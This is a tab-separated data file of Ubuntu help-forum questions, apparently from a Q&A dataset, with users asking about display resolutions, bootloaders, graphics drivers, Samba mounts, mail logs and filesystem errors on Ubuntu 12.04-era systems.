195577	wrong tv resolution for hdmi	i want to connect my laptop ( toshiba i5 with ati drivers , i have proprietary ones installed ) to my sony kdl-32v2000 tv , which has a 1366x768 resolution . the resolution of my laptop is also 1366x768 . however , when i put the hdmi cable inside the laptop , the resolution of the laptop and the tv switches to 1280x720 . from the display settings , i have the `` mirror displays '' box ticked . there 's no 1366x768 option in the resolution dropdown menu . how can i solve it ? why are there these kinds of problems ? i have read quite some questions about hdmi and external monitors problems . on windows 7 , i plug in the hdmi cable and it works . why is n't this the case for ubuntu ( 12.04 ) that i 'm using ?
195579	mount my own samba share ?	i would like to access my local data , which is exported as a samba share , as if i am a samba client . basically , how do i correctly mount my own samba share ? the following mount ( device ) parameters : //localhost/share_name //127.0.0.1/share_name //ip_of_samba_server/share_name all result in `` mount : special device < device > does not exist '' . other clients have no trouble connecting/mounting the share . gvfs/nautilus mounting is also working just fine . ubuntu 12.04 in use .
195580	how to restore windows7 after restore ubuntu bootloader ?	at first i will describe my situation in a few points : i have installed windows7 , and then ubuntu 11.04 on my machine . then everything works fine and at start of system i have screen from linux where i can choose the system . then i reinstall windows7 and install windows 8 on other partition . then i can choose between win7 and win8 when i start system . then i need my ubuntu back so i want restore my bootloader from ubuntu . i boot ubuntu from usb and in terminal write this commands : sudo fdisk -l then i get : /dev/sda1 1 13 104391 de dell utility /dev/sda2 14 2805 22425601 5 rozszerzona /dev/sda3 * 2805 41968 314572800 7 hpfs/ntfs /dev/sda4 41968 60802 151282688 7 hpfs/ntfs /dev/sda5 14 2445 19530752 83 linux /dev/sda6 2445 2805 2893824 82 linux swap / solaris next commands : sudo mount /dev/sda5 /mnt sudo mount -- bind /dev /mnt/dev sudo mount -- bind /proc /mnt/proc sudo chroot /mnt grub-install /dev/sda i get installation finished . no error reported.. and when i start my machine i have old ubuntu start screen to choose system . ubuntu works well . but there are no windows 8 option . but my primary problem is when i choose windows 7 i have : error : no such device ... error : no such disk so i have no idea what can i do . i really need both systems to work . any help would be appreciated .
195582	how to install gnome fallback only without full gnome ?	how do i just install gnome fallback . i loved the gnome classic and i use only that . so i want to just install gnome-fallback and not the full gnome . i am using ubuntu 12.04lts . can anyone please help me ?
195587	why do system detail does n't show my graphics card	i am using nvidia 9500gt graphics card and so i use nvidia proprietory driver as my driver but in the system detail it shows graphics unknown why ?
195594	run application in specific x server or vnc port	i have an application that i 'd like to run , yet i 'd like it to be visible only through a certain vnc port . i do n't want the app to show up on the normal ubuntu desktop . i want the app to run `` in the background '' , and be viewable through vnc only . and when connected to this `` alternate x server '' , the end-user would n't see any menu bars , no window decorations.. just the app . come to think of it , what i 'm asking for is a sort of kiosk-mode for only a certain app , accessible through vnc . is this possible or am i really reaching here ? thanks ! note that the app i wish to run in this fashion is written in java . it is a jnlp file .
195603	are there any ways to access icloud-based files with ubuntu ?	i have various apple products which sync with icloud . are there any ways to access icloud documents with ubuntu ( for clarity , i 'm not asking about email , calendaring , etc . ) apart from the web-based access at https : //www.icloud.com/ ? the ideal option would be a daemon that syncs with icloud in a similar way to how dropbox does . however , a programmable api or gui-based solution would be good too . essentially i 'm looking to investigate the options ; i appreciate they are likely to be reverse-engineered and not 100 % official or supported .
195612	need software to record from external system	want to record from external source such as audio cassette to the computer , what software is the best , is kazam any good .
195613	does ubuntu support 64 bit cpus ?	am thinking of upgrading to a new laptop ( 64 bit ) and would like to install ubuntu 12.04 or newer . are they compatible ?
195617	is it a good idea to share partitions between distros	this is what my laptop 's partitions look like windows : about 100 gb ubuntu root : 50 gb ( mounted at / ) free space : 50 gb ubuntu home partition : the rest of the space ( mounted at /home ) i want to install keep installing different distros at the free space starting with fedora as i want to experiment with distros . what i also want to do is that share my home partition with ubuntu . my work requires me to keep ubuntu and i have been using it since 8.04 . so i am pretty comfortable using it . am i allowed to use same username and same folder without actually overwriting anything here ? my plan is to enter the same username so that i start using the /home/myusername folder across distros . will it work ? is there any potential problem with sharing the same /home/myusername folder as my home in the other distro .
195618	how can i make thunderbird faster ?	i installed ubuntu 11.10 one year ago and i stayed with it since i like the launcher behavior and it continues to make me happy without any problems . i stop using my computer for almost one month and now each time i launch thunderbird the application hang for 2/3 minutes with a lots of hard drive access . i think this might be related to the sqlite and search engine re-index after an eavy imap load . but my reflexion is more from a user view . i do n't want to wait at thunderbird startup but i do n't care to wait on messages search . first of all : how can i purge my thunderbird so it wo n't take long at startup ? how can we make thunderbird stay calm so that other user wo n't have this bug again ? edit : the first thing i tried is configuration : you can configure accounts to keep only last 2000 mails you can also empty the trash on exit how could i see what 's going on with my hard drive ? edit : i installed iotop that give me this informations : 9184 be/4 natim 0.00 b/s 2.80 m/s 0.00 % 3.77 % thunderbird
195619	creating a graphic interface for python 2.5.4	i just downloaded and successfully installed python 2.5.4 , from here python version 2.5.4 tried to search for an idle for python 2.5.4 but no success ... ... is there a tutorial or anything to help me install the idle for python 2.5.4 help will be much appreciated
195624	update manager notifications not getting in kubuntu	i am using ubuntu 12.04 . generally in ubuntu with ubuntu-desktop i can get desktop notifications if any new updates are available for the system . but i am not getting such type of updates in kde . is there any way to enable them in my pc ?
195629	software center is crashed	i 've installed a ubuntu 12.04 with windows 7 . at the very beginning it worked perfectly and raised no problems . i installed the 3rd party updates also while installing the os . so the mp3 and videos are working perfectly . but a day later , a big core problem is raised on my system . if i opened the ubuntu software-center , it just opens and the animated wheel turns for a couple of second and suddenly it closes . likewise , all the libreoffice applications are seeming so . when i open them , it just opens and welcome screen stands for a couple of seconds and suddenly closes . i tried to overcome these issues by using these codes . sudo rm /var/lib/apt/lists/* -vf sudo apt-get autoclean sudo apt-get update and tried many codes . but nothing responds . hope my packages are crashed . so please anyone help me to overcome this issue thank you
195630	how do i do a full hard drive wipe and start back with just os , and nothing else	i am going to be getting rid of a computer and giving it to a friend . i want to wipe all documents and files , all ubuntu mods and applications and give it to him with no data or application but the operating system still there . the harddrive is dedicated to ubuntu . please help .
195631	what is the significance of '* ' ( star , asterisk ) in the file listing results ?	i have noticed that some of my files have an asterisk at end . does the asterisk at the end have any particular significance ? i think they are mostly executable and displayed in green by the ls command . you will see that ./bkmp* and ./bkmp0* have an asterisk at the end . they are executable bash scripts . here 's my output : drwxr-xr-x 7 username username 4096 oct 2 18:28 ./ drwxr-xr-x 8 root root 4096 oct 2 09:25 ../ -rw-r -- r -- 1 username username 3724 sep 22 03:06 .bashrc -rwxr -- r -- 1 username username 319 sep 22 03:42 .bkmp* -rwxr -- r -- 1 username username 324 sep 29 23:30 .bkmp0* drwx -- -- -- 2 username username 4096 sep 17 13:52 .cache/ -rw-r -- r -- 1 username username 675 sep 17 13:37 .profile drwx -- -- -- 2 username username 4096 sep 22 10:10 .ssh/ drwx -- -- -- 2 username username 4096 sep 24 19:49 .ssh.local/ drwxr-xr-x 2 username username 4096 sep 22 04:10 archives/ drwxr-xr-x 3 username username 4096 sep 24 19:51 home/ -rw-r -- r -- 1 username username 27511 sep 24 19:51 username_backup.20120924_1908.tar.gz
195633	unity gone and can not be reinstalled ?	help.unity got uninstalled after i used ppa purge to delete a repository when i use synaptic to install it it says : `unity : depends : libglib2.0-bin but it is not going to be installed help`
195636	after upgrading to 11.10 and attempting to install wine , i get `` the method driver /usr/lib/apt/methods/ppa could not be found ''	additionally , no file with the name `` ppa '' exists in /usr/lib/apt/methods . any idea what might have happened to that file , and how i might recreate it ? btw , this was after upgrading from 11.04 via the gui upgrade path .
195638	`` battery not present '' when power cable is removed	i have installed ubuntu 12.04 lts on my acer aspire-5745 . it is not detecting the battery and showing it as not present if i take out the power cable , still it is working with the same `` battery not present status '' need help ...
195641	does ubuntu install drivers for intel graphics and nvidia cards ?	when i install ubuntu for the first time , does the installation procedure get drivers for the intel graphics built in to the system , as well as the nvidia card , which is what i wish to use ?
195647	unable to enable dual displays	i am running an almost-fresh version of ubuntu 12.04 on my old dell inspiron 710m laptop . i had to re-install yesterday due to a different display issue . i was n't able to directly reinstall 12.04 because my system ca n't handle the pae kernel . instead i installed xubuntu 12.04 and then installed the ubuntu desktop . now i am unable to enable my dual displays . i want to use the laptop screen and an asus ve228d monitor attached to the vga port . ubuntu sees both of them ( both via xrandr , below and displays ) . i can set both to 'on ' in displays , but when i hit apply , only one shows the desktop ( the other remains black ) . there 's no error message given , but my mouse wo n't scroll far off of the visible screen , suggesting that the the desktop is n't being extended , either . xxxx @ mel : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 2048 x 2048 lvds1 connected ( normal left inverted right x axis y axis ) 1280x800 60.0 + 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 531mm x 299mm 1920x1080 60.0*+ 1600x1200 60.0 1680x1050 60.0 1280x1024 75.0 60.0 1440x900 59.9 1280x960 60.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 dvi1 disconnected ( normal left inverted right x axis y axis ) i have an old intel video controller , here 's the extent of what i know about it . xxxx @ mel : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 82852/855gm integrated graphics device ( rev 02 ) prior to the reinstall , i was able to have dual output with this same setup , same graphics driver , etc . i would love to hear any suggestions about what to try . i 've seen people post this information from lshw as well , so here it is ( in case it 's useful ) . xxxx @ mel : ~ $ sudo lshw -c display [ sudo ] password for xxxx : pci ( sysfs ) *-display:0 description : vga compatible controller product : 82852/855gm integrated graphics device vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 32 bits clock : 33mhz capabilities : pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:11 memory : e8000000-efffffff memory : e0000000-e007ffff ioport:1800 ( size=8 ) *-display:1 unclaimed description : display controller product : 82852/855gm integrated graphics device vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 02 width : 32 bits clock : 33mhz capabilities : pm cap_list configuration : latency=0 resources : memory : f0000000-f7ffffff memory : e0080000-e00fffff a few additional comments : fwiw , i logged into an xfce session to see what the situation was there . xfce showed the extended desktop across both displays , though changing the display resolutions caused problems there ( overlapping desktops , black regions outside the virtual desktop ) . i try to mirror monitors through ubuntu , the desktop only shows up on one , the other remains blank . dual display with extended desktops works fine on my windows partition ( though i ca n't get as high of resolution on the large monitor as i want ) .
195649	ca n't login to facebook using opera	after typing my details in and clicking login opera takes me to an error page . this does n't happen in chrome , firefox or opera on other oss . the page shows the error : internal communication error . it then offers to search for https : //www.facebook.com/login.php ? login_attempt=1 regenerating the .opera folder does not fix the problem .
195650	further question on intel graphics driver	ok , josh answered almost immed. ! i need to know specifically , now that i am using nvidia card effectively , do i need to allow update manager to update the intel gr . drivers ? i must add , i believe i know why update manager is telling me i need to update those intel gr . drivers . it probably happened because i tried to update my nvidia drivers and got a buggy install , which let to to a black screen . i shut the system down manually after that and rebooted to a black screen and upon a further reboot i ascertained that i could still dual-boot ( windows 7 ) into the other os . then i went through the restart process and at the grub2 menu chose other options and it was probably , at that time , that linux was smart enough to know that nvidia drivers as installed were n't cutting it , and reverted to the onboard intel graphics system ... does that make sense ? anyway , after successfully getting up and running , i reinstalled my old but successful nvidia drivers and all was well again , except now upon running update manager , i am offered the intel graphics driver upgrade each time , which , up til now i have unchecked ... my question is now more obvious . should i accept the intel driver update and if i do , will it once again override my nvidia drivers ?
195652	is there a standard place for placing custom linux scripts ?	i am developing a set of scripts , which i want to be present for all users , when i set up a server . but i do n't want them in the standard locations like /usr [ /local ] / [ bin ] , [ sbin ] etc . is there some existing convention for where such scripts should be placed ?
195653	how to prevent ubuntu ( running in vmware ) shutt down when the pc is shut down accidentally ?	i 'm using ubuntu in vmware 8 in a public lab and sometimes the computer may be restarted or shut down accidentally . is there any way to prevent ubuntu from shutting down in order to continue running the program from where it has been stopped ?
195657	serious crashing problem with ubuntu 12.04	i installed ubuntu on my new computer ( no other os ) , and it crashes suddenly all the time , there is no program that i specifically use when ubuntu crashes . when it occurs , i ca n't move the mouse or do anything , it stops disabling any move but does n't shut down the computer or show an alert or something like that . i use ubuntu 12.04 64 bit . my computer : hp pro , intel i7 processor , ram 8go , nvidia gt520 2go , 20 '' hp 2011x led screen . excuse me if i made mistakes , english is my third language . please help .
195661	both speakers and headphone are giving sound . how to fix it ?	i have tried many solutions but they are not working for me i have hp pavilion dv6 -2150us i 'm new on ubuntu and linux . so i do n't know how to give command so kindly explain each and every work about giving command please , it is a request .
195663	how i can assign sdc/sdd to my usb drives	i am having strange problem . ca n't find any solution . using ubuntu 12.04 . my hard disk drive assigned as sda . if i plug-in any usb drive , it automatically assigned as sdb . that 's fine . but after reboot , usb drives assigned as sda and hard disk drive shows as sdb . so my fstab mount point showing error on start . i would like to make any usb drive , goes after hard drive - as usually been in windows . please , anyone help me . i am struggling at this point . thanking you in advance . raihan
195666	ubuntu 12.04 nvidia drivers	i am new to ubuntu . and i have been trying to install a new version of the nvidia drivers . when i do so , the resolution changes to 800*600 and i am unable to change it back . the reason i believe i need new drivers is because i tried to install world of warcraft and i manage to do so via wine altough i were experiencing som graphical bugs . under `` settings/details/graphics '' it says `` driver unknown '' i tried to download the driver from nvidias homepage ( but i did't know how to install it : ( ) is it possible my graphical bugs have something do to with wine ? or is this do to my drivers ? and is there a way to get the `` settings/details/graphics right ?
195669	internet via wifi disconnects when i connect ethernet cable to connect a ethernet device ?	internet via wifi disconnects when i connect ethernet cable to connect to a ethernet device . wifi is configured for dhcp and connected with internet - works okay . if i connect ethernet cable with a computer card , static ip configured to connect an ethernet device , then it stops internet access . i remove cable instantly start working again . i am setting up this on latitude d830 . any suggestion to fix this problem ? thanks ,
195670	gwibber error with facebook log in-with strange warning	gwibber used to work fine . then after resetting my accounts it wont log in and gives this error in red but refuses log in success security warning : the above url is not not valid for a cash card or gift card . giving away the url may result in your account being hijacked .
195671	wo n't hibernate when battery critical	ubuntu 12.04 64bit refuses to hibernate when battery is critically low . instead it does a complete shutdown which is unnecessary and can cause loss of data . i have enabled hibernate ( pm-hibernate ) on following the common instructions i tested pm-hibernate it is works fine when run manually . i have set my power options to hibernate `` when power is critically low '' . this has also been verified by using dconf editor . under org > gnome > settings-daemon > plugins > power > critical-battery-action it is set to `` hibernate '' . under the same schema , time-action is set to `` 120 '' . i would like to see what is happening just prior to this shutdown . i would like to know what logs to search to see if pm-hibernate is actually failing , or if it is being ignored entirely . barring figuring this out on my own , is there a suggested work around ?
195674	how to fix xubuntu lightdm theme after installing unity .	after successfully installing xubuntu 12.04.1 on my laptop , i decided to install unity . that went ok but then i realized there was no themes . so then i installed the themes and artwork , and got a really bad surprise . my lightdm greeter was still xubuntu like i wanted but the buttons where you choose the user are really tall and i have a purple computer as the icon above my computer name . how do i get back to the original xubuntu configuration or edit the css while keeping unity ? i know where all of the files are but do n't know which file to edit or which css property to modify . packages installed : unity unity-services unity-mail then i installed : ubuntu-artwork light-themes ubuntu-wallpapers-oneric ubuntu-wallpapers-precise
195675	installing and usb boot problems	i initially tried running ubuntu off of a usb flash drive but the files got deleted , now when i boot my laptop it shows both windows 7 and ubuntu operating systems but the ubuntu system says its missing a file and cant run it after the files where lost i downloaded ubuntu on a cd and installed it into my hard drive following the instructions on the installation menu but the same error message shows up whenever i try to run ubuntu . it says im missing some files , as if it were still trying to run it from a usb how can i remove the nonfunctional ubuntu from my boot menu ?
195679	how can i install ubuntu on a server that has openfiler already ?	i am trying to install ubuntu on this server dell 1750 , but it has openfiler . i reboot the server with the cd already in , but it wo n't read it or do anything . are there any specific command on openfiler that i need to use in order for me to install ubuntu ?
195683	boot from iso partition using grub2	i have a few dozen disk images ( iso 's ) that i use as a technician , ie : ms dart , backtrack , acronis , etc . i would like to be able to select a menu option in grub2 to enable me to select one of the many images to boot from . i have heard that you can create partitions and format them as cd format so that one could copy the contents of the boot disk to the partition and boot from it . i intend to create the partitions on my primary hdd . is this the best method of booting an iso ? please tell me how in either case . note : i know how to use gparted , so i wo n't need step-by-step for that portion . hardware : hp dv7-1232nr 2 hdd's software : primary hdd - 500gb - ubuntu 12.04.1 secondary hdd - 320gb - windows 7 home premium
195688	windows being placed on wrong monitor	i 'm running a fresh install of ubuntu 12.04x64 ( ati radeon hd4770 with open source drivers ) and i am having trouble getting windows to appear on the right screen . yesterday i plugged in my secondary monitor and it worked perfectly out of the box , except that for some reason , compiz wants to place windows on the secondary monitor rather than the first . this is a problem because i do n't use the secondary monitor 100 % of the time , and i do n't want windows being placed on it when it is off . also , it 's only some windows that are getting placed there . for example , the `` edit connections '' window from the networking menu is always placed off my primary screen . there are a number of other windows that do the same . while some , like nautilus , always appear on the proper monitor . i played around with compiz config settings manager and found that if i disable the `` place windows '' plugin , all of the windows appear on the proper monitor -- except that they are placed underneath the unity panel , so i have to alt-drag them out each time in order to use them . with out without that plugin , i ca n't seem to get a sensible setup . the windows are supposed to appear only on the active display , but for some reason compiz does n't want to do that with some windows . does anyone know a fix for this ? i 'd rather not have to disable and re-enable my monitor every single time i use it ...
195689	glade stock buttons unable to change	as in title i have a problem with glade ... field to change button stock icon or label is not responsive . ( see photos ) i 'm running 32bit ubuntu 12.10 ( it might be a problem ? )
195690	nvidia card 640m ca n't be detected	i am new in ubuntu . i have a acer v3-571g with nvidia 640m and intel hd 4000 . i installed ubuntu and nvidia driver but i ca n't choose resolution 640x480 . i tried reinstalling the driver , configured xorg but no help . i reinstalled ubuntu and use command to see my graphic cards . i saw bad result , ubuntu ca n't detect model my nvidia . how i can fix this ? *-display unclaimed description : vga compatible controller product : nvidia corporation vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller cap_list configuration : latency=0 resources : memory : b2000000-b2ffffff memory : a0000000-afffffff memory : b0000000-b1ffffff ioport:2000 ( size=128 ) *-display description : vga compatible controller product : ivy bridge graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:44 memory : b3000000-b33fffff memory : c0000000-cfffffff iopor
195696	dash bar is not comming up 12.04	i have an nvidia card and drivers installed . everything was going on correctly until i installed he updates . after the updates ( nvidia drivers are also updated ) the hidden dash bar stays hidden : ( is it a bug ? does it have any fixes ? i am thinking to reinstall ubuntu . thanks
195697	weird postfix logs	at the mail.log this appears ~2 times per minute . i did n't care what they were , but now i want to find the reason . oct 2 20:27:02 sa-pd postfix/cleanup [ 31255 ] : 13a342ce301c : message-id= < 20121002182702.13a342ce301c @ sa-pd.eu > oct 2 20:27:02 sa-pd postfix/bounce [ 30816 ] : e41782ce301b : sender non-delivery notification : 13a342ce301c oct 2 20:27:02 sa-pd postfix/qmgr [ 6230 ] : 13a342ce301c : from= < > , size=2454 , nrcpt=1 ( queue active ) oct 2 20:27:02 sa-pd postfix/qmgr [ 6230 ] : e41782ce301b : removed oct 2 20:27:02 sa-pd postfix/virtual [ 27222 ] : 13a342ce301c : to= < www-data @ sapd @ censored ( itsmymaindomain ) > , relay=virtual , delay=0.18 , delays=0.09/0/0/0.09 , dsn=5.1.1 , status=bounced ( unknown user : `` www-data @ sapd @ censored ( itsmymaindomain ) '' ) oct 2 20:27:02 sa-pd postfix/qmgr [ 6230 ] : 13a342ce301c : removed oct 2 20:28:02 sa-pd postfix/pickup [ 24018 ] : 18d432ce301b : uid=33 from= < www-data > oct 2 20:28:02 sa-pd postfix/cleanup [ 31255 ] : 18d432ce301b : message-id= < 20121002182802.18d432ce301b @ censored ( itsmymaindomain ) > oct 2 20:28:02 sa-pd postfix/qmgr [ 6230 ] : 18d432ce301b : from= < www-data @ sapd @ censored ( itsmymaindomain ) > , size=657 , nrcpt=1 ( queue active ) oct 2 20:28:02 sa-pd postfix/virtual [ 30817 ] : 18d432ce301b : to= < www-data @ sapd @ censored ( itsmymaindomain ) > , orig_to= < www-data > , relay=virtual , delay=0.33 , delays=0.26/0/0/0.07 , dsn=5.1.1 , status=bounced ( unknown user : `` www-data @ sapd @ censored ( itsmymaindomain ) '' ) does someone have an idea ?
195704	migrate 12.04 wubi install to new partition with corrupted win7 install and small hard drive	the move from win7 to ubuntu 12.04 has been honestly awesome . but i 've come into a snag because my win7 inevitably broke . i can still boot into ubuntu even though win7 is broken ( wo n't boot , ca n't repair ) . i 'd like to migrate wubi to a real partition and forget about windows . presumably under normal conditions i would run the ubuntu live cd , create a new partition then log back into my wubi install and migrate using the script to the new partition . but i 'm worried if i do that i 'll break my current wubi set-up and be unable to migrate . i have a small hard drive , only 75gb and unfortunately my backup drive recently died so ca n't migrate there first and transfer over either . does anybody have any suggestions to solve this ?
195708	installing 11.10 on flash drive failed	this is my problem . i burned ubuntu 11.10 iso to a cd . i was able to boot my pc with it . i plugged in my flash drive , and inserted the cd and restarted the computer to boot ubuntu . i then chose to install ubuntu alongside with windows ( xp prof. ) . then i was able to select my flash drive as the installation location . i prepared partitons by dragging a bar and allocating the size for the ubuntu installation , and for other files . i set 3gb for ubuntu and 1gb for other files . the pen drive was partitioned and files installed on it . after sucess i ejected the cd to restart the pc to use the new os . when it restarted i expected to be asked to select an os to boot . but i could only boot with windows xp . properties of my flash drive show its total capacity is 1gb . the partitioned 3gb is missing . how can i boot with the usb stick ? how can i get my 4gb usb stick back ?
195709	only root see soundcards with aplay -l	first of all i must warn you that i come from a failed upgrading from ubuntu 11 to 12.04 . because ( i guess ) i used wdm instead of gdm . infact wdm automatically closed during the upgrading and , automatically , gdm starts . however now , i ca n't play any sound from normal user , i usually do n't get an error , but no sound still come . e.g . if i start banshee it normally works but it stay mute . but i can play everything with the sudo command . i think a starting point to get the reason is to understand why the normal user do n't see a soundcard.. me @ this : ~ $ aplay -l aplay : device_list:240 : no soundcards found ... and from root : me @ this : ~ $ sudo aplay -l **** list of playback hardware devices **** home directory /home/me not ours . card 0 : intel [ hda intel ] , device 0 : conexant analog [ conexant analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : conexant digital [ conexant digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 thanks in advice
195713	error importing itunes media into banshee media player - unable to map itunes uri to local uri	i 'm trying to import my itunes library into banshee . unfortunately , i 'm getting a message on a number of tracks that says `` unable to map itunes uri to local uri . '' it seems to be showing up on entire albums rather than random individual tracks . what does it mean and how do i fix it ?
195715	hebrew points-letters are misplaced in added font after putting the points ( voweling ) . image inside	i 've added fonts to ubuntu 12.10 beta 2 ( with .fonts folder in `` home '' ) . i can use the fonts , but , while putting points ( voweling in hebrew ) , the letters get messed up . here is a photo-the words in the second paragraph are not showed correctly : also , it seems to happen in libreoffice but not in inkscape . is there a way to fix it ? thanks to you all .
195721	is there a way to ignore unity alt menu when using the terminal ?	i frequently work with emacs in the gnome terminal on ubuntu 12.04 . i have a pretty vanilla setup at the moment and i keeping running into this one problem that i have n't been able to resolve . when using emacs i frequently use alt ( meta ) and probably one out of every ten times i use it my timing is off by just enough that ubuntu/unity interprets my alt as a call for the terminal menu popping up on the hud . this is frustrating because i am usually typing at such a rapid pace that a ton of my commands get put into the hud search instead of into the terminal which throws off my work flow . so my question is : is there a way to disable the unity hud for certain applications or change the way it interprets alt ? any approach for solving this problem would be appreciated . thanks !
195722	nfs users getting a laggy gui expierence	i am setting up a system ( ubuntu 12.04 ) that uses ldap , pam , and autofs to load users and their home folders from a remote server . one of the options for login is sitting down at the machine and starting a gui session . programs such as chormium ( browser ) that preform many read/write operations in the ~/.cache and ~/.config files are slowing down the gui experience as well as putting strain of the nfs server that is causing other users to have problems . ubuntu had the handy-dandy xdg_config_home and xdg_cache_home variables that can be set to change the default location of .cache and .config from the home folder to somewhere else . there are several places to set them , but most of them are not optimal . /etc/environment pros : will work across all shells cons : can not use variables like $ user so that you ca n't make users have different new locations for .cache and .config . every users ' new location would be the same directory . /etc/bash.bashrc pros : $ user works , so you can place them in different folders cons : only gets run for bash compatible shells ~/.pam_environment pros : works regardless of shell cons : can not use system variables ( like $ user ) , has it 's own syntax , and has to be created for every user
195730	read-only filesystem	i 've resized a partition ( ext4 ) from a live cd with gparted , and after reboot it says that the file system is read-only . i 've rebooted again from the cd and checked it with gparted with no errors . how could i find out why does it re-mount the file system in read-only mode ? edit : it starts normally , but after some time , the `` / '' mount point gets remounted with read only settings , so i think it does have errors eventually . is there any other way to repair it ? fstab : proc /proc proc nodev , noexec , nosuid 0 0 uuid=20e01341-4171-43da-99e5-7b49d83d21d5 / ext4 errors=remount-ro 0 1 uuid=8059f2f1-2cae-44a6-a21d-fe466813e641 none swap sw 0 0 smartctl -a /dev/sda : === start of information section === device model : toshiba mk3276gsx serial number : 617ap1jtt lu wwn device id : 5 000039 352601a90 firmware version : gs001c user capacity : 320.072.933.376 bytes [ 320 gb ] sector size : 512 bytes logical/physical device is : not in smartctl database [ for details use : -p showall ] ata version is : 8 ata standard is : exact ata specification draft version not indicated local time is : wed oct 3 12:57:01 2012 cest smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x02 ) offline data collection activity was completed without error . auto offline data collection : disabled . self-test execution status : ( 0 ) the previous self-test routine completed without error or no self-test has ever been run . total time to complete offline data collection : ( 120 ) seconds . offline data collection capabilities : ( 0x51 ) smart execute offline immediate . no auto offline data collection support . suspend offline collection upon new command . no offline surface scan supported . self-test supported . no conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 84 ) minutes . sct capabilities : ( 0x003f ) sct status supported . sct error recovery control supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x002f 100 100 050 pre-fail always - 0 2 throughput_performance 0x0027 100 100 050 pre-fail always - 0 3 spin_up_time 0x0023 100 100 002 pre-fail always - 1131 4 start_stop_count 0x0032 100 100 000 old_age always - 2117 5 reallocated_sector_ct 0x0033 100 100 010 pre-fail always - 0 7 seek_error_rate 0x002f 100 100 050 pre-fail always - 0 8 seek_time_performance 0x0025 100 100 050 pre-fail offline - 0 9 power_on_hours 0x0032 098 098 000 old_age always - 1013 10 spin_retry_count 0x0033 142 100 030 pre-fail always - 0 12 power_cycle_count 0x0032 100 100 000 old_age always - 1834 183 runtime_bad_block 0x0032 100 100 001 old_age always - 0 184 end-to-end_error 0x0033 100 100 097 pre-fail always - 0 185 unknown_attribute 0x0032 100 100 001 old_age always - 65535 187 reported_uncorrect 0x0032 100 100 000 old_age always - 0 188 command_timeout 0x0032 100 100 000 old_age always - 0 189 high_fly_writes 0x003a 100 100 001 old_age always - 0 190 airflow_temperature_cel 0x0022 064 049 040 old_age always - 36 ( min/max 29/37 ) 191 g-sense_error_rate 0x0032 100 100 000 old_age always - 62 192 power-off_retract_count 0x0022 100 100 000 old_age always - 131074 193 load_cycle_count 0x0032 099 099 000 old_age always - 14344 196 reallocated_event_count 0x0032 100 100 000 old_age always - 0 197 current_pending_sector 0x0032 100 100 000 old_age always - 0 199 udma_crc_error_count 0x0032 200 200 000 old_age always - 0 smart error log version : 1 no errors logged smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 short offline completed without error 00 % 1013 - # 2 short offline completed without error 00 % 3 - smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay . demsg : [ 11782.181320 ] ext4-fs error ( device sda1 ) : ext4_ext_search_left:1224 : inode # 5636499 : comm flush-8:0 : ix ( 17474 ) ! = ext_first_index ( 0 ) ( depth 1 ) ! [ 11782.181331 ] aborting journal on device sda1-8 . [ 11782.183375 ] ext4-fs ( sda1 ) : remounting filesystem read-only [ 11782.183396 ] ext4-fs error ( device sda1 ) in ext4_da_writepages:2317 : io failure [ 11782.183584 ] ext4-fs ( sda1 ) : ext4_da_writepages : jbd2_start : 992 pages , ino 5636499 ; err -30 should i try to remove the file with the inode id . 5636499 ? this is the path of the file : ~/.cache/google-chrome/default/cache/data_3 ( is it possible to check if there are other files like this ? ) edit : after deleting chrome cache , i have n't experienced this error .
195732	chrome will not print	it 'll go through the motions , with print head moving slower than normal , but spits blank page . i have to print from firefox every time . i am printing in draft black with hplip & a hp deskjet d1660 . i can not find any relevant content on google so have posted here in the hope someone knows how to troubleshoot .
